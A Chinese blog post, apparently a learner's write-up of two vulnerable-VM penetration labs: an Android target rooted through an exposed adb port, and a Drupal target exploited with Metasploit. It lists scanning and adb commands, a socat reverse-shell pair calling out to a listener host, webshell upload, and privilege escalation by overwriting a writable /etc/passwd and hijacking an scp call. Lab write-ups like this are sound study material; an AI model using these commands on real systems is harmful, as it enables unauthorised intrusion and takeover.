Facebook Twitter Linkedin YouTube VK Xing

靶机渗透学习(android和drupal)

安全客:https://www.anquanke.com/post/id/158937#h2-1

两个简单的渗透,第一个是一个很简单的安卓,不过第一次碰到安卓渗透,看着别人的wp做的,第二个是drupal.

简单记录一下吧

android4

下载

Android4靶机下载:https://pan.baidu.com/s/1mdjXHQOYwUC8iVvHvKmo2A

安装

vmbox的管理->导入虚拟电脑,然后导入ova文件即可
blacsheep

开机之后
blacsheep

找ip

直接netdiscover
blacsheep
然后ip是192.168.1.100

或者arp-scan -l也可以

扫端口

nmap -sS -p- -v -T5 192.168.1.100

然后得到结果
blacsheep

拿shell

端口有8080,那先去8080看下

blacsheep

然后他说有后门,那么扫一下目录
找到backdoor.php,但是没什么用

blacsheep

然后去看下22000端口
blacsheep

发现是SSH-2.0-dropbear_2014.66
searchsploit一下
blacsheep
发现版本不对

然后再去看下5555端口
发现是adb
去找了下资料,发现安卓的默认adb端口好像是5037,不过有的人也习惯改成5555

知道了是adb,那么我们就直接安装adb就好了

apt-get install adb

然后

adb connect 192.168.1.100:5555
adb shell

就拿到shell了
blacsheep

然后就是提权了,说实话这个提权蛮蠢的,su root就是root了..
blacsheep

然后data/root找到flag
blacsheep

后续

既然都有权限了,再去web目录下面找找看后门吧
在announce/backdoor.php下面找到后门
blacsheep

blacsheep

不过并不能拿到flag,因为没有权限,还是得用到shell

最后,由于之前登录界面进不去,但是现在不一样了,我们是root了,直接去把锁删掉就好了
blacsheep
然后就进去了
blacsheep

billu b0x

主要学提权吧,然后就是drupal的最新漏洞

下载

靶机下载:https://pan.baidu.com/s/1NAAiXJUouE9AoW-wYJf_tQ

安装

和前面安卓的一样

找ip

一样的
blacsheep

ip:192.168.31.10

扫端口

blacsheep

拿shell

首先去80
然后发现是drupal
blacsheep

前段时间报了个drupal的漏洞,去msf看下
blacsheep
然后用一下drupal的最新漏洞,设置好lhost和rhost
然后拿到反弹的meterpreter
blacsheep

提权

这里主要是学习一下提权的知识
拿到shell但是上传文件很复杂,所以我们先写一个木马进去,然后蚁剑连上去,方便传文件
blacsheep

blacsheep

先传几个探测脚本
blacsheep
然后切一个简易终端,这个详细可以看http://www.freebuf.com/news/142195.html

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 

blacsheep

/etc/passwd

这次的/etc/passwd可写,而且可以改密码的hash,那就简单了,我们覆盖密码,然后权限给0:0
blacsheep

然后就root了
blacsheep

/opt/s

首先/opt里面有s
strings一下
blacsheep
发现有scp命令而且是root,那么我们写一个恶意的scp然后去覆盖执行就可以了
blacsheep

Leave a Reply

Your email address will not be published.Required fields are marked *

%d 博主赞过: